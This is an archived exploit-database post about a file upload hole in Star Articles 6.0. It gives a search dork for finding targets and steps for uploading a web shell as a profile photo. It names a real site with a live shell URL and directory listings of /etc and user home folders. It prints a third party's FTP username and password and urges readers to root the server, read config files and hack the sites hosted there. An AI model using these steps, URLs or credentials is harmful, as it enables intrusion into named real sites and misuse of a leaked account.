Star Articles 6.0 Remote File Upload Vulnerability



EDB-ID: 7251 CVE: 2008-7076OSVDB-ID: 50459
Author: ZoRLuPublished: 2008-11-27Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
[~] Star Articles 6.0 Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] dork: allinurl:"article.download.php"   ( baya bi site var )
[~]
[~] N0T: pls dont make demos ( demolarI hacklemeyin LUTFEN kucuk bir rica )
[~] -----------------------------------------------------------
expl:
http://script//authorphoto/user_name[id].php
example:
http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bir cok site var. ya rootlayýn yada tek tek cakýn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bu serverdaki bir site icin:
ftp://ftp.ababy.com.au/  ( ftp pass ve username )
user: kiddybab
pass: KidEw1nk08
ne biliyim iste biseler yapmaya calIsIn amacIm yardImcý olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
first register for site
after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
click to gozat button and select your shell after upload you shell
more after go repat edit profile page and you look you photo. right click to you photo
select to properties copy photo link and paste you explorer.
go your shell
examp:
user: trt-turk@hotmail.com
passwd: zorlu1
login:
http://www.lcfarticles.com/user.login.php
shell:
http://www.lcfarticles.com//authorphoto/zorlu40.php
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & RedHaK
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-11-27]






Comments

No comments so far